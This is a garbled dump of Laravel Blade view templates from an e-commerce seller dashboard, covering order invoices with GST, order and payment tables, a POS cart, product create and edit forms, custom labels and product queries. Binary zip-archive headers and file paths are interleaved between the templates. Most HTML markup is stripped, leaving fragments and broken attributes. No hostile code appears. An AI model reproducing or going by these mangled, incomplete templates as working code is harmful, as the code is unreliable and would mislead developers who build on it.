    {{ json_decode($order->shipping_address)->address }}, {{ json_decode($order->shipping_address)->city }}, @if(isset(json_decode($order->shipping_address)->state)) {{ json_decode($order->shipping_address)->state }} - @endif {{ json_decode($order->shipping_address)->postal_code }}
    {{ json_decode($order->shipping_address)->country }}
    @else
    {{ $order->user->name }}
    {{ $order->user->email }}
    {{ $order->user->phone }}
    @endif @if ($order->manual_payment && is_array(json_decode($order->manual_payment_data, true)))
    {{ translate('Payment Information') }}
    {{ translate('Name') }}: {{ json_decode($order->manual_payment_data)->name }}, {{ translate('Amount') }}: {{ single_price(json_decode($order->manual_payment_data)->amount) }}, {{ translate('TRX ID') }}: {{ json_decode($order->manual_payment_data)->trx_id }}

    @endif {{ translate('Sold By') }}:
    {{ $order->shop->name ?? get_setting('site_name') }} @php $gstin = get_seller_gstin($order); @endphp @if($gstin && is_numeric($first_order->gst_amount))
    {{ translate('GSTIN') }}: {{ $gstin }} @endif
    {{ get_seller_address($order) }}
    {{ translate('Order #') }} {{ $order->code }}
    {{ translate('Order Status') }} @if ($delivery_status == 'delivered') {{ translate(ucfirst(str_replace('_', ' ', $delivery_status))) }} @else {{ translate(ucfirst(str_replace('_', ' ', $delivery_status))) }} @endif
    {{ translate('Order Date') }} {{ date('d-m-Y h:i A', $order->date) }}
    {{ translate('Total amount') }} {{ single_price($order->grand_total) }}
    {{ translate('Payment method') }} {{ translate(ucfirst(str_replace('_', ' ', $order->payment_type))) }}
    {{ translate('Additional Info') }} {{ $order->additional_info }}

    @if(is_numeric($first_order->gst_amount)) @if(same_state_shipping($order)) @else @endif @else @endif @foreach ($order->orderDetails as $key => $orderDetail) @if(is_numeric($first_order->gst_amount)) @php $gst_amount = get_gst_by_price_and_rate($orderDetail->price - $orderDetail->coupon_discount , $orderDetail->gst_rate); $shipping_gst = get_gst_by_price_and_rate($orderDetail->shipping_cost, $orderDetail->gst_rate); @endphp @if(same_state_shipping($order)) @else @endif @else @endif @if(is_numeric($first_order->gst_amount)) @else @endif @if(is_numeric($first_order->gst_amount)) @if(same_state_shipping($order)) @else @endif @endif @endforeach
    # {{ translate('Photo') }} {{ translate('Description') }} {{ translate('Delivery Type') }} {{ translate('Qty') }} {{ translate('Gross Amount')}} {{ translate('Discount/ Coupon')}} {{ translate('Taxable Value')}}{{ translate('CGST') }} {{ translate('SGST') }}{{ translate('IGST') }} {{ translate('Price') }} {{ translate('Total') }}
    {{ $key + 1 }} @if ($orderDetail->product != null && $orderDetail->product->auction_product == 0) @elseif ($orderDetail->product != null && $orderDetail->product->auction_product == 1) @else {{ translate('N/A') }} @endif @if ($orderDetail->product != null && $orderDetail->product->auction_product == 0) {{ $orderDetail->product->getTranslation('name') }} {{ $orderDetail->variation }} @elseif ($orderDetail->product != null && $orderDetail->product->auction_product == 1) {{ $orderDetail->product->getTranslation('name') }} @else {{ translate('Product Unavailable') }} @endif @if ($order->shipping_type != null && $order->shipping_type == 'home_delivery') {{ translate('Home Delivery') }} @elseif ($order->shipping_type == 'pickup_point') @if ($order->pickup_point != null) {{ $order->pickup_point->getTranslation('name') }} ({{ translate('Pickup Point') }}) @else {{ translate('Pickup Point') }} @endif @elseif($order->shipping_type == 'carrier') @if ($order->carrier != null) {{ $order->carrier->name }} ({{ translate('Carrier') }})
    {{ translate('Transit Time').' - '.$order->carrier->transit_time }} @else {{ translate('Carrier') }} @endif @endif
    {{ $orderDetail->quantity }} {{ single_price($orderDetail->price) }} {{ single_price($orderDetail->coupon_discount) }} {{ single_price($orderDetail->price - $orderDetail->coupon_discount) }} {{ single_price($gst_amount/2) }} {{ single_price($gst_amount/2) }} {{ single_price($gst_amount) }} {{ single_price($orderDetail->price / $orderDetail->quantity) }} {{ single_price($orderDetail->price - $orderDetail->coupon_discount + $gst_amount) }}{{ single_price($orderDetail->price) }}
    {{translate('Shipping')}} 1 {{ single_price($orderDetail->shipping_cost) }} {{ single_price(0) }} {{ single_price($orderDetail->shipping_cost) }} {{ single_price($shipping_gst/2) }} {{ single_price($shipping_gst/2) }} {{ single_price($shipping_gst) }} {{ single_price($orderDetail->shipping_cost + (($orderDetail->shipping_cost* $orderDetail->gst_rate)/100)) }}
    @if(is_numeric($first_order->gst_amount)) @else @endif
    {{ translate('Sub Total') }} : {{ single_price($order->orderDetails->sum('price') + $order->orderDetails->sum('shipping_cost') - $order->orderDetails->sum('coupon_discount')) }}
    {{ translate('GST Amount') }} : {{ single_price($order->orderDetails->sum('gst_amount')) }}
    {{ translate('Sub Total') }} : {{ single_price($order->orderDetails->sum('price')) }}
    {{ translate('Tax') }} : {{ single_price($order->orderDetails->sum('tax')) }}
    {{ translate('Shipping') }} : {{ single_price($order->orderDetails->sum('shipping_cost')) }}
    {{ translate('Coupon') }} : {{ single_price($order->coupon_discount) }}
    {{ translate('TOTAL') }} : {{ single_price($order->grand_total) }}
    @endsection @section('script') @endsection PK�N]Бs&&*views/seller/orders/orders_table.blade.phpnu�[���
    @forelse ($orders as $key => $order) @empty @endforelse
    {{ translate('Order Code') }} {{ translate('Products') }} {{ translate('Customer') }} {{ translate('Seller') }} {{ translate('Amount') }} {{ translate('Delivery Status') }} {{ translate('Payment method') }} {{ translate('Payment Status') }} {{ translate('Options') }}
    {{ $order->code }} @if ($order->shipping_method == 'shiprocket')
    {{ translate('Shiprocket Order Id') }}: {{ $order->shiprocket_order_id }} @endif @if ($order->shipping_method == 'steadfast')
    {{ translate('Steadfast Consignment Id') }}: {{ $order->steadfast_consignment_id }} @endif @if ($order->shipping_method == 'pathao')
    {{ translate('Pathao Consignment Id') }}: {{ $order->pathao_consignment_id }} @endif @if ($order->viewed == 0) {{ translate('New') }} @endif @if (addon_is_activated('pos_system') && $order->order_from == 'pos') {{ translate('POS') }} @php $source = strtolower($order->order_source); $badgeClass = match($source) { 'walkin' => 'badge-warning', 'facebook' => 'badge-info', 'whatsapp' => 'badge-success', default => 'badge-danger', }; @endphp {{ ucfirst($order->order_source) }} @endif
    {{ count($order->orderDetails) }} @if ($order->user != null) {{ $order->user->name }} @else Guest ({{ $order->guest_id }}) @endif @php $shop = optional($order->shop); @endphp {{ Str::limit($shop->name, 20)?? '' }}

    {{ single_price($order->grand_total) }}

    {{ translate(ucfirst(str_replace('_', ' ', $order->delivery_status))) }}

    @if ($order->shipping_method == 'shiprocket') {{ translate('Shiprocket Status') }}: {{ ucfirst(translate(str_replace('_', ' ', $order->shiprocket_status))) }} @elseif ($order->shipping_method == 'steadfast') {{ translate('Steadfast Status') }}: {{ ucfirst(translate(str_replace('_', ' ', $order->steadfast_status))) }} @elseif ($order->shipping_method == 'pathao') {{ translate('Pathao Status') }}: {{ ucfirst(translate(str_replace('_', ' ', $order->pathao_status))) }} @endif
    {{ translate(ucfirst(str_replace('_', ' ', $order->payment_type))) }} @if ($order->payment_status == 'paid') {{ translate('Paid') }} @else {{ translate('Unpaid') }} @endif
    {{ translate('No Orders found!') }}
    @if($orders->hasPages()) @endif
    PK�N]}�(���&views/seller/payment_history.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ translate('Payment History') }}
    @if (count($payments) > 0)
    @foreach ($payments as $key => $payment) @endforeach
    # {{ translate('Date')}} {{ translate('Amount')}} {{ translate('Payment Method')}}
    {{ $key+1 }} {{ date('d-m-Y', strtotime($payment->created_at)) }} {{ single_price($payment->amount) }} {{ translate(ucfirst(str_replace('_', ' ', $payment->payment_method))) }} @if ($payment->txn_code != null) ({{ translate('TRX ID') }} : {{ $payment->txn_code }}) @endif
    {{ $payments->links() }}
    @endif
    @endsection PK�N]��9 9 1views/seller/pos/guest_shipping_address.blade.phpnu�[���
    PK�N]��NJkXkX#views/seller/pos/products.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('POS products') }}

    @endsection @section('modal') @include('modals.loading_modal')
    @include('offcanvas.products_select_right_canvas')
    @endsection @section('script') @endsection PK�N] f�� views/seller/pos/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ translate('Loading..') }}
    @php $userID = Session::has('pos.user_id') ? Session::get('pos.user_id') : null; @endphp
    {{--
    --}}
    @csrf
    @if(addon_is_activated('gst_system')) @endif
    @php $subtotal = 0; $tax = 0; $gst = 0; $carts = get_pos_user_cart(); @endphp @if (count($carts) > 0)
      @forelse ($carts as $key => $cartItem) @php $product = $cartItem->product; $stock = $cartItem->product->stocks->where('variant', $cartItem['variation'])->first(); $subtotal += cart_product_price($cartItem,$product,false, false) *$cartItem['quantity']; $tax += cart_product_tax($cartItem, $product, false)*$cartItem['quantity']; if (addon_is_activated('gst_system')) { $cartCount = count($carts); $session_discount = Session::get('pos.discount', 0); $session_shipping = Session::get('pos.shipping', 0); $gst += pos_cart_product_gst($cartItem, $product, $session_discount/$cartCount, $session_shipping/$cartCount , false); } $cartID = $cartItem['id']; @endphp
    • {{ $product->name }}
      {{ $cartItem['variant'] }}
      {{ single_price($cartItem['price']) }} x {{ $cartItem['quantity'] }}
      {{ single_price($cartItem['price']*$cartItem['quantity']) }}
    • @empty
    • {{ translate('No Product Added') }}

    • @endforelse
    @else

    {{ translate('No Product Added') }}

    @endif
    {{translate('Sub Total')}} {{ single_price($subtotal) }}
    @if(!addon_is_activated('gst_system'))
    {{translate('Tax')}} {{ single_price($tax) }}
    @endif
    {{translate('Shipping')}} {{ single_price(Session::get('pos.shipping', 0)) }}
    {{translate('Discount')}} {{ single_price(Session::get('pos.discount', 0)) }}
    @if(addon_is_activated('gst_system'))
    {{translate('GST')}} {{ single_price($gst) }}
    @endif
    {{translate('Total')}} {{ single_price($subtotal+$gst+$tax+Session::get('pos.shipping', 0) - Session::get('pos.discount', 0)) }}
    @endsection @section('modal') {{-- Change Customer Confirmation Modal--}} {{-- Offline Payment Modal --}}
    @include('offcanvas.products_select_right_canvas')
    @include('modals.loading_modal') @endsection @section('script') @endsectionPK�N]G��)views/seller/pos/pos_activation.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{translate('POS Configuration')}}

    {{ translate('Thermal Printer Size') }}
    @csrf
    {{ translate('mm') }}
    @endsection PK�N]G��P  +views/seller/pos/shipping_address.blade.phpnu�[���
    @foreach (\App\Models\Address::where('user_id',$user_id)->get() as $key => $address) @endforeach
    {{ translate('Add New Address') }}
    PK�N]��\��!�!Bviews/seller/product/category_wise_discount/set_discount.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{translate('Set Category Base Product Discount')}}

    {{ translate('Categories') }}
    @foreach($categories as $key => $category) @php $discount = $category->sellerDiscount; $start_date = $discount && $discount->discount_start_date ? date('d-m-Y H:i:s', $discount->discount_start_date) : null; $end_date = $discount && $discount->discount_end_date ? date('d-m-Y H:i:s', $discount->discount_end_date) : null; @endphp @endforeach
    # {{translate('Icon')}} {{translate('Name')}} {{ translate('Parent Category') }} {{ translate('Discount') }} {{ translate('Discount Date Range') }} {{ translate('Action') }}
    {{ ($key+1) + ($categories->currentPage() - 1)*$categories->perPage() }} @if($category->icon != null) {{translate('icon')}} @else — @endif {{ $category->getTranslation('name') }} @if($category->digital == 1) {{translate('Digital')}} @endif @php $parent = \App\Models\Category::where('id', $category->parent_id)->first(); @endphp @if ($parent != null) {{ $parent->getTranslation('name') }} @else — @endif
    %
    {{ $categories->appends(request()->input())->links() }}
    @endsection @section('modal') @endsection @section('script') @endsection PK�N]�]���?views/seller/product/custom_label/custom_label_create.blade.phpnu�[���@if (get_setting('seller_can_add_custom_label') != 0) @extends('seller.layouts.app') @section('panel_content')
    {{ translate('Custom Label Information') }}
    @csrf
    @endsection @section('script') @endsection @endifPK�N]���a!a!=views/seller/product/custom_label/custom_label_edit.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ translate('Edit Custom Label Information') }}
    @csrf
    @endsection @section('script') @endsectionPK�N]�g;�ZZ=views/seller/product/custom_label/custom_label_list.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Custom Label') }}

    @if (get_setting('seller_can_add_custom_label') != 0) @endif
    @foreach ($custom_labels as $key => $custom_label) @endforeach
    # {{ translate('Label') }} {{ translate('Added By') }} {{ translate('Options') }}
    {{ $key + 1 + ($custom_labels->currentPage() - 1) * $custom_labels->perPage() }} {{ $custom_label->getTranslation('text') }} {{ $custom_label->user->name }} {{-- @if($custom_label->user_id == auth()->id()) --}} {{-- @endif --}}
    {{ $custom_labels->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsectionPK�N]�"U$ss4views/seller/product/custom_label/products.blade.phpnu�[���@if(count($product_ids) > 0) @foreach ($product_ids as $key => $id) @php $product = \App\Models\Product::findOrFail($id); @endphp @endforeach
    {{translate('Product')}} {{translate('Base Price')}} {{translate('Added By')}}
    {{ $product->getTranslation('name') }}
    {{ $product->unit_price }} {{ optional($product->user)->name }}
    @endifPK�N]9W哚`�`5views/seller/product/digitalproducts/create.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Add Your Product') }}

    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    {{translate('General')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('This is used for search. Input those words by which cutomer can find this product.')}}
    {{translate('Images')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('These images are visible in product details page gallery. Use 600x600 sizes images.')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('This image is visible in all product box. Use 300x300 sizes image. Keep some blank space around main object of your image as we had to crop some edge in different devices to make it responsive.')}}
    {{translate('Meta Tags')}}
    {{ translate('Separate with coma') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Price')}}
    @if (addon_is_activated('gst_system'))
    @else @foreach (\App\Models\Tax::where('tax_status', 1)->get() as $tax)
    @endforeach @endif
    @if(get_setting('product_external_link_for_seller') == 1)
    {{translate('Leave it blank if you do not use external site link')}}
    {{translate('Leave it blank if you do not use external site link')}}
    @endif
    {{translate('Product Information')}}
    {{-- Frequently Bought Products --}}
    {{ translate('Frequently Bought') }}
    {{-- Select Category for Frequently Bought Product --}}
    {{ translate('Product Category') }}
    {{ translate('Select Main') }} {{ translate('This will be used for commission based calculations and homepage category wise product Show.') }}
      @foreach ($categories as $category)
    • {{ $category->getTranslation('name') }}
    • @foreach ($category->childrenCategories as $childCategory) @include('backend.product.products.child_category', ['child_category' => $childCategory]) @endforeach @endforeach
    @endsection @section('modal') @include('modals.product_select_modal') @endsection @section('script') @include('partials.product.product_temp_data') @endsectionPK�N]���l�l�3views/seller/product/digitalproducts/edit.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Update Your Product') }}

    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('This is used for search. Input those words by which cutomer can find this product.')}}
    {{translate('Images')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('These images are visible in product details page gallery. Use 600x600 sizes images.')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('This image is visible in all product box. Use 300x300 sizes image. Keep some blank space around main object of your image as we had to crop some edge in different devices to make it responsive.')}}
    {{translate('Meta Tags')}}
    {{ translate('Separate with coma') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('Price')}}
    @if (addon_is_activated('gst_system'))
    @else @foreach (\App\Models\Tax::where('tax_status', 1)->get() as $tax) @php $tax_amount = 0; $tax_type = ''; foreach ($tax->product_taxes as $row) { if ($product->id == $row->product_id) { $tax_amount = $row->tax; $tax_type = $row->tax_type; } } @endphp
    @endforeach @endif @php $date_range = ''; if($product->discount_start_date){ $start_date = date('d-m-Y H:i:s', $product->discount_start_date); $end_date = date('d-m-Y H:i:s', $product->discount_end_date); $date_range = $start_date.' to '.$end_date; } @endphp
    @if(get_setting('product_external_link_for_seller') == 1)
    {{translate('Leave it blank if you do not use external site link')}}
    {{translate('Leave it blank if you do not use external site link')}}
    @endif
    {{-- Frequently Bought Products --}}
    {{ translate('Frequently Bought') }}
    frequently_bought_selection_type == 'product') checked @endif >
    frequently_bought_selection_type == 'category') checked @endif >
    @php $fq_bought_products = $product->frequently_bought_products()->where('category_id', null)->get(); @endphp
    @if(count($fq_bought_products) > 0)
    @foreach($fq_bought_products as $fQBproduct) @endforeach
    {{ translate('Product Thumb') }} {{ translate('Product Name') }} {{ translate('Category') }} {{ translate('Options') }}

    {{ translate('Image')}}

    {{ $fQBproduct->frequently_bought_product->getTranslation('name') }}

    {{ $fQBproduct->frequently_bought_product->main_category->name ?? translate('Category Not Found') }}
    @endif
    {{-- Select Category for Frequently Bought Product --}}
    @php $fq_bought_product_category_id = $product->frequently_bought_products()->where('category_id','!=', null)->first(); $fqCategory = $fq_bought_product_category_id != null ? $fq_bought_product_category_id->category_id : null; @endphp
    {{ translate('Product Category') }}
    {{ translate('Select Main') }} {{ translate('This will be used for commission based calculations and homepage category wise product Show.') }}
    @php $old_categories = $product->categories()->pluck('category_id')->toArray(); @endphp
      @foreach ($categories as $category)
    • {{ $category->getTranslation('name') }}
    • @foreach ($category->childrenCategories as $childCategory) @include('backend.product.products.child_category', ['child_category' => $childCategory]) @endforeach @endforeach
    @endsection @section('modal') @include('modals.product_select_modal') @endsection @section('script') @endsectionPK�N]V�8�$�$4views/seller/product/digitalproducts/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Digital Products') }}

    @if (addon_is_activated('seller_subscription'))
    {{ max(0, auth()->user()->shop->product_upload_limit - auth()->user()->products()->count()) }}
    {{ translate('Remaining Uploads') }}
    @endif @if (addon_is_activated('seller_subscription')) @php $seller_package = \App\Models\SellerPackage::find(Auth::user()->shop->seller_package_id); @endphp @endif
    {{ translate('All Products') }}
    @if(get_setting('product_approve_by_admin') == 1) @endif @foreach ($products as $key => $product) @if(get_setting('product_approve_by_admin') == 1) @endif @endforeach
    # {{ translate('Name')}} {{ translate('Category')}} {{ translate('Base Price')}}{{ translate('Approval')}}{{ translate('Published')}} {{ translate('Featured')}} {{ translate('Options')}}
    {{ $key+1 }} {{ $product->getTranslation('name') }} @if ($product->main_category != null) {{ $product->main_category->getTranslation('name') }} @endif {{ $product->unit_price }} @if ($product->approved == 1) {{ translate('Approved')}} @else {{ translate('Pending')}} @endif
    {{ $products->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]��=�����.views/seller/product/products/create.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Add Your Product') }}

    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    {{ translate('Product Information') }}
    @if (addon_is_activated('pos_system'))
    @endif
    {{ translate('Product Images') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{translate('These images are visible in product details page gallery. Minimum dimensions required: 900px width X 900px height.')}}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{translate("This image is visible in all product box. Minimum dimensions required: 195px width X 195px height. Keep some blank space around main object of your image as we had to crop some edge in different devices to make it responsive.")}}
    {{ translate('Product Videos') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Try to upload videos under 30 seconds for better performance.') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Add thumbnails in the same order as your videos. If you upload only one image, it will be used for all videos.') }}
    ' data-target=".video-provider-link"> {{ translate('Add Another') }}
    {{ translate('Product Variation') }}

    {{ translate('Choose the attributes of this product and then input values of each attribute') }}


    {{ translate('Product price + stock') }}
    @if(get_setting('product_external_link_for_seller') == 1)
    {{ translate('Leave it blank if you do not use external site link') }}
    {{ translate('Leave it blank if you do not use external site link') }}
    @endif
    {{ translate('Product Description') }}
    {{ translate('PDF Specification') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('SEO Meta Tags') }}
    {{ translate('Separate with coma') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{-- Refund --}} @if (addon_is_activated('refund_request'))
    {{ translate('Refund') }}
    {{translate('Refund Note')}}
    @endif {{-- Warranty --}}
    {{ translate('Warranty') }}
    {{translate('Warranty Note')}}
    {{-- Frequently Bought Products --}}
    {{ translate('Frequently Bought') }}
    {{-- Select Category for Frequently Bought Product --}}
    {{ translate('Product Category') }}
    {{ translate('Select Main') }} {{ translate('This will be used for commission based calculations and homepage category wise product Show.') }}
      @foreach ($categories as $category)
    • {{ $category->getTranslation('name') }}
    • @foreach ($category->childrenCategories as $childCategory) @include('backend.product.products.child_category', ['child_category' => $childCategory]) @endforeach @endforeach
    {{ translate('Shipping Configuration') }}
    @if (get_setting('shipping_type') == 'product_wise_shipping')
    @else

    {{ translate('Shipping configuration is maintained by Admin.') }}

    @endif
    {{ translate('Low Stock Quantity Warning') }}
    {{ translate('Stock Visibility State') }}
    {{ translate('Cash On Delivery') }}
    @if (get_setting('cash_payment') == '1')
    @else

    {{ translate('Cash On Delivery activation is maintained by Admin.') }}

    @endif
    {{ translate('Estimate Shipping Time') }}
    {{ translate('Days') }}
    @if (addon_is_activated('gst_system'))
    {{ translate('HSN & GST') }}
    @else
    {{ translate('VAT & Tax') }}
    @foreach (\App\Models\Tax::where('tax_status', 1)->get() as $tax)
    @endforeach
    @endif
    @endsection @section('modal') @include('modals.product_select_modal') {{-- Note Modal --}} @include('modals.note_modal') @endsection @section('script') @include('partials.product.product_temp_data') @endsection PK�N]j� 6+6+,views/seller/product/products/edit.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Update your product') }}

    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    @if (addon_is_activated('pos_system'))
    @endif
    {{translate('Product Images')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('These images are visible in product details page gallery. Minimum dimensions required: 900px width X 900px height.')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate("This image is visible in all product box. Minimum dimensions required: 195px width X 195px height. Keep some blank space around main object of your image as we had to crop some edge in different devices to make it responsive.")}}
    {{ translate('Product Videos') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Try to upload videos under 30 seconds for better performance.') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Add thumbnails in the same order as your videos. If you upload only one image, it will be used for all videos.') }}
    ' data-target=".video-provider-link"> {{ translate('Add Another') }}
    {{translate('Product Variation')}}

    {{ translate('Choose the attributes of this product and then input values of each attribute') }}


    @foreach (json_decode($product->choice_options) as $key => $choice_option)
    {{-- --}}
    @endforeach
    {{translate('Product price + stock')}}
    @php $date_range = ''; if($product->discount_start_date){ $start_date = date('d-m-Y H:i:s', $product->discount_start_date); $end_date = date('d-m-Y H:i:s', $product->discount_end_date); $date_range = $start_date.' to '.$end_date; } @endphp
    @if(get_setting('product_external_link_for_seller') == 1)
    {{translate('Leave it blank if you do not use external site link')}}
    {{translate('Leave it blank if you do not use external site link')}}
    @endif
    {{translate('Product Description')}}
    {{translate('PDF Specification')}}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{translate('SEO Meta Tags')}}
    {{ translate('Separate with coma') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{-- Refund --}} @if (addon_is_activated('refund_request'))
    {{ translate('Refund') }}
    {{translate('Refund Note')}}
    @if($product->refundNote != null)
    {{ $product->refundNote->getTranslation('description') ?? '' }}
    @endif
    @endif {{-- Warranty --}}
    {{ translate('Warranty') }}
    {{translate('Warranty Note')}}
    @if($product->warrantyNote != null)
    {{ $product->warrantyNote->getTranslation('description') ?? '' }}
    @endif
    {{-- Frequently Bought Products --}}
    {{ translate('Frequently Bought') }}
    frequently_bought_selection_type == 'product') checked @endif >
    frequently_bought_selection_type == 'category') checked @endif >
    @php $fq_bought_products = $product->frequently_bought_products()->where('category_id', null)->get(); @endphp
    @if(count($fq_bought_products) > 0)
    @foreach($fq_bought_products as $fQBproduct) @endforeach
    {{ translate('Product Thumb') }} {{ translate('Product Name') }} {{ translate('Category') }} {{ translate('Options') }}

    {{ translate('Image')}}

    {{ $fQBproduct->frequently_bought_product->getTranslation('name') }}

    {{ $fQBproduct->frequently_bought_product->main_category->name ?? translate('Category Not Found') }}
    @endif
    {{-- Select Category for Frequently Bought Product --}}
    @php $fq_bought_product_category_id = $product->frequently_bought_products()->where('category_id','!=', null)->first(); $fqCategory = $fq_bought_product_category_id != null ? $fq_bought_product_category_id->category_id : null; @endphp
    {{ translate('Product Category') }}
    {{ translate('Select Main') }} {{ translate('This will be used for commission based calculations and homepage category wise product Show') }}
    @php $old_categories = $product->categories()->pluck('category_id')->toArray(); @endphp
      @foreach ($categories as $category)
    • {{ $category->getTranslation('name') }}
    • @foreach ($category->childrenCategories as $childCategory) @include('backend.product.products.child_category', ['child_category' => $childCategory]) @endforeach @endforeach
    {{translate('Shipping Configuration')}}
    @if (get_setting('shipping_type') == 'product_wise_shipping')
    @else

    {{ translate('Shipping configuration is maintained by Admin.') }}

    @endif
    {{translate('Low Stock Quantity Warning')}}
    {{translate('Stock Visibility State')}}
    {{translate('Cash On Delivery')}}
    @if (get_setting('cash_payment') == '1')
    @else

    {{ translate('Cash On Delivery activation is maintained by Admin.') }}

    @endif
    {{translate('Estimate Shipping Time')}}
    {{translate('Days')}}
    @if (addon_is_activated('gst_system'))
    {{ translate('HSN & GST') }}
    @else
    {{translate('VAT & Tax')}}
    @foreach(\App\Models\Tax::where('tax_status', 1)->get() as $tax) @php $tax_amount = 0; $tax_type = ''; foreach($tax->product_taxes as $row) { if($product->id == $row->product_id) { $tax_amount = $row->tax; $tax_type = $row->tax_type; } } @endphp
    @endforeach
    @endif
    @endsection @section('modal') @include('modals.product_select_modal') {{-- Note Modal --}} @include('modals.note_modal') @endsection @section('script') @endsection PK�N]�[H�]]-views/seller/product/products/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Products') }}

    @if (addon_is_activated('seller_subscription'))
    {{ max(0, auth()->user()->shop->product_upload_limit - auth()->user()->products()->count()) }}
    {{ translate('Remaining Uploads') }}
    @endif @if (addon_is_activated('seller_subscription')) @php $seller_package = \App\Models\SellerPackage::find(Auth::user()->shop->seller_package_id); @endphp @endif
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal')
    @include('offcanvas.products_select_right_canvas')
    @endsection @section('script') @endsectionPK�N]g3/ckNkN6views/seller/product/products/products_table.blade.phpnu�[���
    @if($ptoduct_type != 'pos_product_list') @endif @forelse ($products as $key => $product) @if($ptoduct_type != 'pos_product_list') @endif @empty @endforelse
    {{ translate('Thumb') }} {{ translate('Name / Brand') }} {{ translate('Owner / Category') }} {{ translate('Ratings') }} {{ translate('Price Details') }} {{ translate('Info') }} {{ translate('Published') }} {{ translate('Featured') }}{{ translate('Options') }}
    Image
    {{ $product->getTranslation('name') }} @if(isset($product->brand->name)) {{ translate($product->brand->name) }} @else {{ translate('No Brand') }} @endif
    @php $shop = optional(optional($product->user)->shop); @endphp {{ $shop->name ?? translate('Inhouse') }} {{ translate('Main Category') }}

    {{translate($product->main_category->name ?? '')}}

    {{ renderStarRatingLatest($product->rating) }}

    {{ $product->rating }}{{ translate('out of') }} 5.0

    @php $total = 0; $total += $product->reviews->where('status', 1)->count(); @endphp

    {{ $total }}{{translate('Reviews') }}

    {{ translate('Price') }}

    {{ single_price($product->unit_price) }}

    @if (discount_in_percentage($product) > 0)

    {{ translate('Discount') }} {{ discount_in_percentage($product) }}%

    @endif
    {{('Number of Sale')}}

    {{ $product->num_of_sale }}

    @if(!$product->draft && !$product->digital) {{translate('View Stock')}} @endif
    @if (!$product->draft) @endif @if (!$product->draft) @endif
    {{ translate('No Products found!') }}
    PK�N]!9@�a a 8views/seller/product/product_bulk_upload/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')

    {{ translate('Bulk Products Upload') }}

    {{ translate('1. Download the skeleton file and fill it with data.')}}:
    {{ translate('2. You can download the example file to understand how the data must be filled.')}}:
    {{ translate('3. Once you have downloaded and filled the skeleton file, upload it in the form below and submit.')}}:
    {{ translate('4. After uploading products you need to edit them and set products images and choices.')}}
    {{ translate('1. Category and Brand should be in numerical id.')}}:
    {{ translate('2. You can download the pdf to get Category and Brand id.')}}:
    {{ translate('Upload CSV File') }}
    @csrf
    @endsection PK�N]� s�C C *views/seller/product_query/index.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ translate('Product Queries') }}
    @foreach ($queries as $key => $query) @endforeach
    # {{ translate('User Name') }} {{ translate('Product Name') }} {{ translate('Question') }} {{ translate('Reply') }} {{ translate('status') }} {{ translate('Options') }}
    {{ $queries->firstItem() + $key }} @if(isset($query->user->name)) {{ $query->user->name }} @else {{ translate('Customer Not found') }} @endif @if(isset($query->product->name)) {{ $query->product->name }} @else {{ translate('Product Not found') }} @endif {{ Str::limit($query->question, 100) }} {{ Str::limit($query->reply, 100) }} {{ $query->reply == null ? translate('Not Replied') : translate('Replied') }}
    {{ $queries->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]O�M�  )views/seller/product_query/show.blade.phpnu�[���@extends('seller.layouts.app') @section('panel_content')
    {{ $query->product->getTranslation('name') }}
    • user != null) src="{{ uploaded_asset($query->user->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';">
      @if ($query->user != null) {{ $query->user->name }} @endif

      {{ $query->created_at->diffForHumans() }}

      {{ strip_tags($query->question) }}

